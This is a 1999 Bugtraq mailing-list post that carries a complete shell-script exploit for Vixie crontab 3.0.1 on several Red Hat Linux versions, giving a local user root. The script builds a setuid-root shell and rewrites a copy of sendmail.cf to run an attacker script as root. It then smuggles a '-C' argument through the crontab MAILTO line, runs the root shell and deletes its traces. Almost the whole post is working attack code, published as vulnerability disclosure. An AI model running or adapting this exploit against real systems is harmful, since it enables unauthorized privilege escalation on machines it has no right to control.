[11672] in bugtraq
Vixie Crontab exploit code
daemon@ATHENA.MIT.EDU (Taeho Oh)
Fri Sep 3 18:24:58 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-Id: <19990902004829.A2579@ohhara.postech.ac.kr>
Date: Thu, 2 Sep 1999 00:48:29 +0900
Reply-To: ohhara@postech.edu
From: Taeho Oh <ohhara@OHHARA.POSTECH.AC.KR>
X-To: bugtraq@NETSPACE.ORG
To: BUGTRAQ@SECURITYFOCUS.COM
Vixie Crontab exploit code
begin vixie-ex
----------------------------------------------------------------------
#!/bin/sh
# Vixie crontab exploit
#
# Local user can gain root access.
#
# Tested redhat linux : 4.2, 5.0, 5.1, 6.0
# Tested vixie crontab version : 3.0.1
#
# This program is only for demonstrative use only.
# USE IT AT YOUR OWN RISK!
#
# Programmed by Taeho Oh 1999/08/31
#
# Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
# PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
# PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
export PATH
echo
echo "Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara"
echo "PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus"
echo "PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug"
echo
echo make shell
echo
cat > /tmp/sh.c << EOF
#include<unistd.h>
#include<stdlib.h>
int main()
{
setuid(0);
setgid(0);
execl("/bin/sh","sh",0);
return 0;
}
EOF
echo compile shell
echo
cc -o /tmp/sh /tmp/sh.c || gcc -o /tmp/sh /tmp/sh.c
echo make execute shell script
echo
cat > /tmp/makesh << EOF
#!/bin/sh
chown root /tmp/sh
chgrp root /tmp/sh
chmod 4755 /tmp/sh
EOF
chmod 755 /tmp/makesh
echo hack sendmail.cf
echo
cp -f /etc/sendmail.cf /tmp/sendmail.cf.tmp1
sed 's/O DefaultUser=8:12/O DefaultUser=0:0/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf
sed 's/P=\/usr\/bin\/procmail/P=\/tmp\/makesh/g' /tmp/sendmail.cf.tmp1 > /tmp/sendmail.cf.tmp2
sed 's/A=procmail/A=makesh/g' /tmp/sendmail.cf.tmp2 > /tmp/sendmail.cf.tmp3
cp /tmp/sendmail.cf.tmp3 /tmp/sendmail.cf
rm -f /tmp/sendmail.cf.tmp1
rm -f /tmp/sendmail.cf.tmp2
rm -f /tmp/sendmail.cf.tmp3
echo make cron file
echo
cat > /tmp/cronfile << EOF
MAILTO=-C/tmp/sendmail.cf `whoami`
* * * * * ls
EOF
echo input cron file
echo
crontab /tmp/cronfile
echo wait for 1 minute
echo
sec=`date +%S`
wait=`expr 65 - $sec`
sleep $wait
echo execute shell
echo
/tmp/sh
echo delete data files
echo
cd /tmp
rm -f sendmail.cf cronfile makesh sh.c
crontab /dev/null
----------------------------------------------------------------------
end vixie-ex
--
Taeho Oh ( ohhara@postech.edu ) http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security ) http://postech.edu/plus
PosLUG ( Postech Linux User Group ) http://postech.edu/group/poslug
